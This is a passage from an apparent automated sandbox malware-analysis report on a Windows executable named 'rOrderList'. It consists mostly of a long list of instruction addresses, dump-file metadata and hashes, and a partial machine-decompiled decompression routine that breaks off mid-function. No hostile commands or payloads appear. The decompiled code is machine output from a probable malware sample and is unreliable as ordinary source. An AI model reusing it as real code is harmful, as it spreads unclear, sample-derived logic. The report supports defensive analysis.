                                                                                      0x00000000
                                                                                      0x00406af9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b02
                                                                                      0x00406b05
                                                                                      0x00406b08
                                                                                      0x00406b0c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b12
                                                                                      0x00406b15
                                                                                      0x00406b17
                                                                                      0x00406b18
                                                                                      0x00406b1b
                                                                                      0x00406b1d
                                                                                      0x00406b1e
                                                                                      0x00406b20
                                                                                      0x00406b23
                                                                                      0x00406b28
                                                                                      0x00406b2d
                                                                                      0x00406b36
                                                                                      0x00406b49
                                                                                      0x00406b4c
                                                                                      0x00406b58
                                                                                      0x00406b80
                                                                                      0x00406b82
                                                                                      0x00406b90
                                                                                      0x00406b90
                                                                                      0x00406b94
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b84
                                                                                      0x00406b84
                                                                                      0x00406b87
                                                                                      0x00406b88
                                                                                      0x00406b88
                                                                                      0x00000000
                                                                                      0x00406b84
                                                                                      0x00406b5e
                                                                                      0x00406b63
                                                                                      0x00406b63
                                                                                      0x00406b6c
                                                                                      0x00406b74
                                                                                      0x00406b77
                                                                                      0x00000000
                                                                                      0x00406b7d
                                                                                      0x00406b7d
                                                                                      0x00000000
                                                                                      0x00406b7d
                                                                                      0x00000000
                                                                                      0x00406b9a
                                                                                      0x00406b9a
                                                                                      0x00406b9e
                                                                                      0x0040744a
                                                                                      0x00000000
                                                                                      0x0040744a
                                                                                      0x00406ba7
                                                                                      0x00406bb7
                                                                                      0x00406bba
                                                                                      0x00406bbd
                                                                                      0x00406bbd
                                                                                      0x00406bbd
                                                                                      0x00406bc0
                                                                                      0x00406bc4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406bc6
                                                                                      0x00406bcc
                                                                                      0x00406bf6
                                                                                      0x00406bfc
                                                                                      0x00406c03
                                                                                      0x00000000
                                                                                      0x00406c03
                                                                                      0x00406bd2
                                                                                      0x00406bd5
                                                                                      0x00406bda
                                                                                      0x00406bda
                                                                                      0x00406be5
                                                                                      0x00406bed
                                                                                      0x00406bf0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c35
                                                                                      0x00406c3b
                                                                                      0x00406c3e
                                                                                      0x00406c4b
                                                                                      0x00406c53
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c0a
                                                                                      0x00406c0a
                                                                                      0x00406c0e
                                                                                      0x00407459
                                                                                      0x00000000
                                                                                      0x00407459
                                                                                      0x00406c1a
                                                                                      0x00406c25
                                                                                      0x00406c25
                                                                                      0x00406c25
                                                                                      0x00406c28
                                                                                      0x00406c2b
                                                                                      0x00406c2e
                                                                                      0x00406c33
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004072ca
                                                                                      0x004072ca
                                                                                      0x004072d0
                                                                                      0x004072d6
                                                                                      0x004072dc
                                                                                      0x004072f6
                                                                                      0x004072f9
                                                                                      0x004072ff
                                                                                      0x0040730a
                                                                                      0x0040730c
                                                                                      0x004072de
                                                                                      0x004072de
                                                                                      0x004072ed
                                                                                      0x004072f1
                                                                                      0x004072f1
                                                                                      0x00407316
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c5b
                                                                                      0x00406c5d
                                                                                      0x00406c60
                                                                                      0x00406cd1
                                                                                      0x00406cd4
                                                                                      0x00406cd7
                                                                                      0x00406cde
                                                                                      0x00406ce8
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x004072c7
                                                                                      0x00406c62
                                                                                      0x00406c66
                                                                                      0x00406c69
                                                                                      0x00406c6b
                                                                                      0x00406c6e
                                                                                      0x00406c71
                                                                                      0x00406c73
                                                                                      0x00406c76
                                                                                      0x00406c78
                                                                                      0x00406c7d
                                                                                      0x00406c80
                                                                                      0x00406c83
                                                                                      0x00406c87
                                                                                      0x00406c8e
                                                                                      0x00406c91
                                                                                      0x00406c98
                                                                                      0x00406c9c
                                                                                      0x00406ca4
                                                                                      0x00406ca4
                                                                                      0x00406ca4
                                                                                      0x00406c9e
                                                                                      0x00406c9e
                                                                                      0x00406c9e
                                                                                      0x00406c93
                                                                                      0x00406c93
                                                                                      0x00406c93
                                                                                      0x00406ca8
                                                                                      0x00406cab
                                                                                      0x00406cc9
                                                                                      0x00406ccb
                                                                                      0x00000000
                                                                                      0x00406cad
                                                                                      0x00406cad
                                                                                      0x00406cb0
                                                                                      0x00406cb3
                                                                                      0x00406cb6
                                                                                      0x00406cb8
                                                                                      0x00406cb8
                                                                                      0x00406cb8
                                                                                      0x00406cbb
                                                                                      0x00406cbe
                                                                                      0x00406cc0
                                                                                      0x00406cc1
                                                                                      0x00406cc4
                                                                                      0x00000000
                                                                                      0x00406cc4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f64
                                                                                      0x00406f68
                                                                                      0x00406f8b
                                                                                      0x00406f8e
                                                                                      0x00406f91
                                                                                      0x00406f9b
                                                                                      0x00406f6a
                                                                                      0x00406f6a
                                                                                      0x00406f6d
                                                                                      0x00406f70
                                                                                      0x00406f73
                                                                                      0x00406f80
                                                                                      0x00406f83
                                                                                      0x00406f83
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x00406fa7
                                                                                      0x00406fab
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fb1
                                                                                      0x00406fb5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fbb
                                                                                      0x00406fbd
                                                                                      0x00406fc1
                                                                                      0x00406fc1
                                                                                      0x00406fc4
                                                                                      0x00406fc8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407018
                                                                                      0x0040701c
                                                                                      0x00407023
                                                                                      0x00407026
                                                                                      0x00407029
                                                                                      0x00407033
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x0040701e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040703f
                                                                                      0x00407043
                                                                                      0x0040704a
                                                                                      0x0040704d
                                                                                      0x00407050
                                                                                      0x00407045
                                                                                      0x00407045
                                                                                      0x00407045
                                                                                      0x00407053
                                                                                      0x00407056
                                                                                      0x00407059
                                                                                      0x00407059
                                                                                      0x0040705c
                                                                                      0x0040705f
                                                                                      0x00407062
                                                                                      0x00407062
                                                                                      0x00407065
                                                                                      0x0040706c
                                                                                      0x00407071
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070ff
                                                                                      0x004070ff
                                                                                      0x00407103
                                                                                      0x004074a1
                                                                                      0x00000000
                                                                                      0x004074a1
                                                                                      0x00407109
                                                                                      0x0040710c
                                                                                      0x0040710f
                                                                                      0x00407113
                                                                                      0x00407116
                                                                                      0x0040711c
                                                                                      0x0040711e
                                                                                      0x0040711e
                                                                                      0x0040711e
                                                                                      0x00407121
                                                                                      0x00407124
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406cf4
                                                                                      0x00406cf4
                                                                                      0x00406cf8
                                                                                      0x00407465
                                                                                      0x00000000
                                                                                      0x00407465
                                                                                      0x00406cfe
                                                                                      0x00406d01
                                                                                      0x00406d04
                                                                                      0x00406d08
                                                                                      0x00406d0b
                                                                                      0x00406d11
                                                                                      0x00406d13
                                                                                      0x00406d13
                                                                                      0x00406d13
                                                                                      0x00406d16
                                                                                      0x00406d19
                                                                                      0x00406d19
                                                                                      0x00406d1c
                                                                                      0x00406d1f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d25
                                                                                      0x00406d2b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d31
                                                                                      0x00406d31
                                                                                      0x00406d35
                                                                                      0x00406d38
                                                                                      0x00406d3b
                                                                                      0x00406d3e
                                                                                      0x00406d41
                                                                                      0x00406d42
                                                                                      0x00406d45
                                                                                      0x00406d47
                                                                                      0x00406d4d
                                                                                      0x00406d50
                                                                                      0x00406d53
                                                                                      0x00406d56
                                                                                      0x00406d59
                                                                                      0x00406d5c
                                                                                      0x00406d5f
                                                                                      0x00406d7b
                                                                                      0x00406d7e
                                                                                      0x00406d81
                                                                                      0x00406d84
                                                                                      0x00406d8b
                                                                                      0x00406d8f
                                                                                      0x00406d91
                                                                                      0x00406d95
                                                                                      0x00406d61
                                                                                      0x00406d61
                                                                                      0x00406d65
                                                                                      0x00406d6d
                                                                                      0x00406d72
                                                                                      0x00406d74
                                                                                      0x00406d76
                                                                                      0x00406d76
                                                                                      0x00406d98
                                                                                      0x00406d9f
                                                                                      0x00406da2
                                                                                      0x00000000
                                                                                      0x00406da8
                                                                                      0x00000000
                                                                                      0x00406da8
                                                                                      0x00000000
                                                                                      0x00406dad
                                                                                      0x00406dad
                                                                                      0x00406db1
                                                                                      0x00407471
                                                                                      0x00000000
                                                                                      0x00407471
                                                                                      0x00406db7
                                                                                      0x00406dba
                                                                                      0x00406dbd
                                                                                      0x00406dc1
                                                                                      0x00406dc4
                                                                                      0x00406dca
                                                                                      0x00406dcc
                                                                                      0x00406dcc
                                                                                      0x00406dcc
                                                                                      0x00406dcf
                                                                                      0x00406dd2
                                                                                      0x00406dd2
                                                                                      0x00406dd2
                                                                                      0x00406dd8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406dda
                                                                                      0x00406ddd
                                                                                      0x00406de0
                                                                                      0x00406de3
                                                                                      0x00406de6
                                                                                      0x00406de9
                                                                                      0x00406dec
                                                                                      0x00406def
                                                                                      0x00406df2
                                                                                      0x00406df5
                                                                                      0x00406df8
                                                                                      0x00406e10
                                                                                      0x00406e13
                                                                                      0x00406e16
                                                                                      0x00406e19
                                                                                      0x00406e19
                                                                                      0x00406e1c
                                                                                      0x00406e20
                                                                                      0x00406e22
                                                                                      0x00406dfa
                                                                                      0x00406dfa
                                                                                      0x00406e02
                                                                                      0x00406e07
                                                                                      0x00406e09
                                                                                      0x00406e0b
                                                                                      0x00406e0b
                                                                                      0x00406e25
                                                                                      0x00406e2c
                                                                                      0x00406e2f
                                                                                      0x00000000
                                                                                      0x00406e31
                                                                                      0x00000000
                                                                                      0x00406e31
                                                                                      0x00406e2f
                                                                                      0x00406e36
                                                                                      0x00406e36
                                                                                      0x00406e36
                                                                                      0x00406e36
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e71
                                                                                      0x00406e71
                                                                                      0x00406e75
                                                                                      0x0040747d
                                                                                      0x00000000
                                                                                      0x0040747d
                                                                                      0x00406e7b
                                                                                      0x00406e7e
                                                                                      0x00406e81
                                                                                      0x00406e85
                                                                                      0x00406e88
                                                                                      0x00406e8e
                                                                                      0x00406e90
                                                                                      0x00406e90
                                                                                      0x00406e90
                                                                                      0x00406e93
                                                                                      0x00406e96
                                                                                      0x00406e96
                                                                                      0x00406e9c
                                                                                      0x00406e3a
                                                                                      0x00406e3a
                                                                                      0x00406e3d
                                                                                      0x00000000
                                                                                      0x00406e3d
                                                                                      0x00406e9e
                                                                                      0x00406e9e
                                                                                      0x00406ea1
                                                                                      0x00406ea4
                                                                                      0x00406ea7
                                                                                      0x00406eaa
                                                                                      0x00406ead
                                                                                      0x00406eb0
                                                                                      0x00406eb3
                                                                                      0x00406eb6
                                                                                      0x00406eb9
                                                                                      0x00406ebc
                                                                                      0x00406ed4
                                                                                      0x00406ed7
                                                                                      0x00406eda
                                                                                      0x00406edd
                                                                                      0x00406edd
                                                                                      0x00406ee0
                                                                                      0x00406ee4
                                                                                      0x00406ee6
                                                                                      0x00406ebe
                                                                                      0x00406ebe
                                                                                      0x00406ec6
                                                                                      0x00406ecb
                                                                                      0x00406ecd
                                                                                      0x00406ecf
                                                                                      0x00406ecf
                                                                                      0x00406ee9
                                                                                      0x00406ef0
                                                                                      0x00406ef3
                                                                                      0x00000000
                                                                                      0x00406ef5
                                                                                      0x00000000
                                                                                      0x00406ef5
                                                                                      0x00000000
                                                                                      0x00407182
                                                                                      0x00407182
                                                                                      0x00407186
                                                                                      0x004074ad
                                                                                      0x00000000
                                                                                      0x004074ad
                                                                                      0x0040718c
                                                                                      0x0040718f
                                                                                      0x00407192
                                                                                      0x00407196
                                                                                      0x00407199
                                                                                      0x0040719f
                                                                                      0x004071a1
                                                                                      0x004071a1
                                                                                      0x004071a1
                                                                                      0x004071a4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f52
                                                                                      0x00406f52
                                                                                      0x00406f55
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x00407291
                                                                                      0x00407295
                                                                                      0x004072b7
                                                                                      0x004072ba
                                                                                      0x004072c4
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x00407297
                                                                                      0x0040729a
                                                                                      0x0040729e
                                                                                      0x004072a1
                                                                                      0x004072a1
                                                                                      0x004072a4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040734e
                                                                                      0x00407352
                                                                                      0x00407370
                                                                                      0x00407370
                                                                                      0x00407370
                                                                                      0x00407377
                                                                                      0x0040737e
                                                                                      0x00407385
                                                                                      0x00407385
                                                                                      0x00000000
                                                                                      0x00407385
                                                                                      0x00407354
                                                                                      0x00407357
                                                                                      0x0040735a
                                                                                      0x0040735d
                                                                                      0x00407364
                                                                                      0x004072a8
                                                                                      0x004072a8
                                                                                      0x004072ab
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040743f
                                                                                      0x00407442
                                                                                      0x00407343
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407079
                                                                                      0x0040707b
                                                                                      0x00407082
                                                                                      0x00407083
                                                                                      0x00407085
                                                                                      0x00407088
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407090
                                                                                      0x00407093
                                                                                      0x00407096
                                                                                      0x00407098
                                                                                      0x0040709a
                                                                                      0x0040709a
                                                                                      0x0040709b
                                                                                      0x0040709e
                                                                                      0x004070a5
                                                                                      0x004070a8
                                                                                      0x004070b6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040738c
                                                                                      0x0040738c
                                                                                      0x0040738f
                                                                                      0x00407396
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040739b
                                                                                      0x0040739b
                                                                                      0x0040739f
                                                                                      0x004074d7
                                                                                      0x00000000
                                                                                      0x004074d7
                                                                                      0x004073a5
                                                                                      0x004073a8
                                                                                      0x004073ab
                                                                                      0x004073af
                                                                                      0x004073b2
                                                                                      0x004073b8
                                                                                      0x004073ba
                                                                                      0x004073ba
                                                                                      0x004073ba
                                                                                      0x004073bd
                                                                                      0x004073c0
                                                                                      0x004073c0
                                                                                      0x004073c0
                                                                                      0x004073c0
                                                                                      0x004073c3
                                                                                      0x004073c3
                                                                                      0x004073c7
                                                                                      0x00407427
                                                                                      0x0040742a
                                                                                      0x0040742f
                                                                                      0x00407430
                                                                                      0x00407432
                                                                                      0x00407434
                                                                                      0x00407437
                                                                                      0x00407343
                                                                                      0x00407343
                                                                                      0x00000000
                                                                                      0x00407349
                                                                                      0x00407343
                                                                                      0x004073c9
                                                                                      0x004073cf
                                                                                      0x004073d2
                                                                                      0x004073d5
                                                                                      0x004073d8
                                                                                      0x004073db
                                                                                      0x004073de
                                                                                      0x004073e1
                                                                                      0x004073e4
                                                                                      0x004073e7
                                                                                      0x004073ea
                                                                                      0x00407403
                                                                                      0x00407406
                                                                                      0x00407409
                                                                                      0x0040740c
                                                                                      0x00407410
                                                                                      0x00407412
                                                                                      0x00407412
                                                                                      0x00407413
                                                                                      0x00407416
                                                                                      0x004073ec
                                                                                      0x004073ec
                                                                                      0x004073f4
                                                                                      0x004073f9
                                                                                      0x004073fb
                                                                                      0x004073fe
                                                                                      0x004073fe
                                                                                      0x00407419
                                                                                      0x00407420
                                                                                      0x00000000
                                                                                      0x00407422
                                                                                      0x00000000
                                                                                      0x00407422
                                                                                      0x00000000
                                                                                      0x004070be
                                                                                      0x004070c1
                                                                                      0x004070f7
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x0040722a
                                                                                      0x0040722a
                                                                                      0x0040722d
                                                                                      0x0040722f
                                                                                      0x004074b9
                                                                                      0x00000000
                                                                                      0x004074b9
                                                                                      0x00407235
                                                                                      0x00407238
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040723e
                                                                                      0x00407242
                                                                                      0x00407245
                                                                                      0x00407245
                                                                                      0x00407245
                                                                                      0x00000000
                                                                                      0x00407245
                                                                                      0x004070c3
                                                                                      0x004070c5
                                                                                      0x004070c7
                                                                                      0x004070c9
                                                                                      0x004070cc
                                                                                      0x004070cd
                                                                                      0x004070cf
                                                                                      0x004070d1
                                                                                      0x004070d4
                                                                                      0x004070d7
                                                                                      0x004070ed
                                                                                      0x004070f2
                                                                                      0x0040712a
                                                                                      0x0040712a
                                                                                      0x0040712e
                                                                                      0x0040715a
                                                                                      0x0040715c
                                                                                      0x00407163
                                                                                      0x00407166
                                                                                      0x00407169
                                                                                      0x00407169
                                                                                      0x0040716e
                                                                                      0x0040716e
                                                                                      0x00407170
                                                                                      0x00407173
                                                                                      0x0040717a
                                                                                      0x0040717d
                                                                                      0x004071aa
                                                                                      0x004071aa
                                                                                      0x004071ad
                                                                                      0x004071b0
                                                                                      0x00407224
                                                                                      0x00407224
                                                                                      0x00407224
                                                                                      0x00000000
                                                                                      0x00407224
                                                                                      0x004071b2
                                                                                      0x004071b8
                                                                                      0x004071bb
                                                                                      0x004071be
                                                                                      0x004071c1
                                                                                      0x004071c4
                                                                                      0x004071c7
                                                                                      0x004071ca
                                                                                      0x004071cd
                                                                                      0x004071d0
                                                                                      0x004071d3
                                                                                      0x004071ec
                                                                                      0x004071ee
                                                                                      0x004071f1
                                                                                      0x004071f2
                                                                                      0x004071f5
                                                                                      0x004071f7
                                                                                      0x004071fa
                                                                                      0x004071fc
                                                                                      0x004071fe
                                                                                      0x00407201
                                                                                      0x00407203
                                                                                      0x00407206
                                                                                      0x0040720a
                                                                                      0x0040720c
                                                                                      0x0040720c
                                                                                      0x0040720d
                                                                                      0x00407210
                                                                                      0x00407213
                                                                                      0x004071d5
                                                                                      0x004071d5
                                                                                      0x004071dd
                                                                                      0x004071e2
                                                                                      0x004071e4
                                                                                      0x004071e7
                                                                                      0x004071e7
                                                                                      0x00407216
                                                                                      0x0040721d
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x00000000
                                                                                      0x0040721f
                                                                                      0x00000000
                                                                                      0x0040721f
                                                                                      0x0040721d
                                                                                      0x00407130
                                                                                      0x00407133
                                                                                      0x00407135
                                                                                      0x00407138
                                                                                      0x0040713b
                                                                                      0x0040713e
                                                                                      0x00407140
                                                                                      0x00407143
                                                                                      0x00407146
                                                                                      0x00407146
                                                                                      0x00407149
                                                                                      0x00407149
                                                                                      0x0040714c
                                                                                      0x00407153
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00000000
                                                                                      0x00407155
                                                                                      0x00000000
                                                                                      0x00407155
                                                                                      0x00407153
                                                                                      0x004070d9
                                                                                      0x004070dc
                                                                                      0x004070de
                                                                                      0x004070e1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e40
                                                                                      0x00406e40
                                                                                      0x00406e44
                                                                                      0x00407489
                                                                                      0x00000000
                                                                                      0x00407489
                                                                                      0x00406e4a
                                                                                      0x00406e4d
                                                                                      0x00406e50
                                                                                      0x00406e53
                                                                                      0x00406e56
                                                                                      0x00406e59
                                                                                      0x00406e5c
                                                                                      0x00406e5e
                                                                                      0x00406e61
                                                                                      0x00406e64
                                                                                      0x00406e67
                                                                                      0x00406e69
                                                                                      0x00406e69
                                                                                      0x00406e69
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fcb
                                                                                      0x00406fcb
                                                                                      0x00406fcf
                                                                                      0x00407495
                                                                                      0x00000000
                                                                                      0x00407495
                                                                                      0x00406fd5
                                                                                      0x00406fd8
                                                                                      0x00406fdb
                                                                                      0x00406fde
                                                                                      0x00406fe0
                                                                                      0x00406fe0
                                                                                      0x00406fe0
                                                                                      0x00406fe3
                                                                                      0x00406fe6
                                                                                      0x00406fe9
                                                                                      0x00406fec
                                                                                      0x00406fef
                                                                                      0x00406ff2
                                                                                      0x00406ff3
                                                                                      0x00406ff5
                                                                                      0x00406ff5
                                                                                      0x00406ff5
                                                                                      0x00406ff8
                                                                                      0x00406ffb
                                                                                      0x00406ffe
                                                                                      0x00407001
                                                                                      0x00407001
                                                                                      0x00407001
                                                                                      0x00407004
                                                                                      0x00407006
                                                                                      0x00407006
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407248
                                                                                      0x00407248
                                                                                      0x00407248
                                                                                      0x0040724c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407252
                                                                                      0x00407255
                                                                                      0x00407258
                                                                                      0x0040725b
                                                                                      0x0040725d
                                                                                      0x0040725d
                                                                                      0x0040725d
                                                                                      0x00407260
                                                                                      0x00407263
                                                                                      0x00407266
                                                                                      0x00407269
                                                                                      0x0040726c
                                                                                      0x0040726f
                                                                                      0x00407270
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407275
                                                                                      0x00407278
                                                                                      0x0040727b
                                                                                      0x0040727e
                                                                                      0x00407281
                                                                                      0x00407285
                                                                                      0x00407287
                                                                                      0x0040728a
                                                                                      0x00000000
                                                                                      0x0040728c
                                                                                      0x00407009
                                                                                      0x00407009
                                                                                      0x00000000
                                                                                      0x00407009
                                                                                      0x0040728a
                                                                                      0x004074bf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406aee
                                                                                      0x004074f6
                                                                                      0x004074f6
                                                                                      0x00000000
                                                                                      0x004074f6
                                                                                      0x00407343
                                                                                      0x004072ca
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x00406efe

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
                                                                                      • Instruction ID: b4a429368d408adc735ccef7c69d02ca95e21b2dffe456e9be617d596e32585a
                                                                                      • Opcode Fuzzy Hash: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
                                                                                      • Instruction Fuzzy Hash: 44711371D04228CFDF28CFA8C954BADBBB1FB44305F15806AD856BB281D7386986DF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 98%
                                                                                      			E00407018() {
                                                                                      				unsigned short _t531;
                                                                                      				signed int _t532;
                                                                                      				void _t533;
                                                                                      				signed int _t534;
                                                                                      				signed int _t535;
                                                                                      				signed int _t565;
                                                                                      				signed int _t568;
                                                                                      				signed int _t589;
                                                                                      				signed int* _t606;
                                                                                      				void* _t613;
                                                                                      
                                                                                      				L0:
                                                                                      				while(1) {
                                                                                      					L0:
                                                                                      					if( *(_t613 - 0x40) != 0) {
                                                                                      						 *(_t613 - 0x84) = 0xb;
                                                                                      						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                                                      						goto L132;
                                                                                      					} else {
                                                                                      						__eax =  *(__ebp - 0x28);
                                                                                      						L88:
                                                                                      						 *(__ebp - 0x2c) = __eax;
                                                                                      						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      						L89:
                                                                                      						__eax =  *(__ebp - 4);
                                                                                      						 *(__ebp - 0x80) = 0x15;
                                                                                      						__eax =  *(__ebp - 4) + 0xa68;
                                                                                      						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                      						L69:
                                                                                      						 *(__ebp - 0x84) = 0x12;
                                                                                      						while(1) {
                                                                                      							L132:
                                                                                      							 *(_t613 - 0x54) = _t606;
                                                                                      							while(1) {
                                                                                      								L133:
                                                                                      								_t531 =  *_t606;
                                                                                      								_t589 = _t531 & 0x0000ffff;
                                                                                      								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                      								if( *(_t613 - 0xc) >= _t565) {
                                                                                      									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                      									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                      									 *(_t613 - 0x40) = 1;
                                                                                      									_t532 = _t531 - (_t531 >> 5);
                                                                                      									 *_t606 = _t532;
                                                                                      								} else {
                                                                                      									 *(_t613 - 0x10) = _t565;
                                                                                      									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                      									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                      								}
                                                                                      								if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                      									goto L139;
                                                                                      								}
                                                                                      								L137:
                                                                                      								if( *(_t613 - 0x6c) == 0) {
                                                                                      									 *(_t613 - 0x88) = 5;
                                                                                      									L170:
                                                                                      									_t568 = 0x22;
                                                                                      									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                      									_t535 = 0;
                                                                                      									L172:
                                                                                      									return _t535;
                                                                                      								}
                                                                                      								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                      								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                      								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                      								L139:
                                                                                      								_t533 =  *(_t613 - 0x84);
                                                                                      								while(1) {
                                                                                      									 *(_t613 - 0x88) = _t533;
                                                                                      									while(1) {
                                                                                      										L1:
                                                                                      										_t534 =  *(_t613 - 0x88);
                                                                                      										if(_t534 > 0x1c) {
                                                                                      											break;
                                                                                      										}
                                                                                      										switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
                                                                                      											case 0:
                                                                                      												if( *(_t613 - 0x6c) == 0) {
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                      												_t534 =  *( *(_t613 - 0x70));
                                                                                      												if(_t534 > 0xe1) {
                                                                                      													goto L171;
                                                                                      												}
                                                                                      												_t538 = _t534 & 0x000000ff;
                                                                                      												_push(0x2d);
                                                                                      												asm("cdq");
                                                                                      												_pop(_t570);
                                                                                      												_push(9);
                                                                                      												_pop(_t571);
                                                                                      												_t609 = _t538 / _t570;
                                                                                      												_t540 = _t538 % _t570 & 0x000000ff;
                                                                                      												asm("cdq");
                                                                                      												_t604 = _t540 % _t571 & 0x000000ff;
                                                                                      												 *(_t613 - 0x3c) = _t604;
                                                                                      												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                      												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                      												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                      												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                      													L10:
                                                                                      													if(_t612 == 0) {
                                                                                      														L12:
                                                                                      														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                      														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
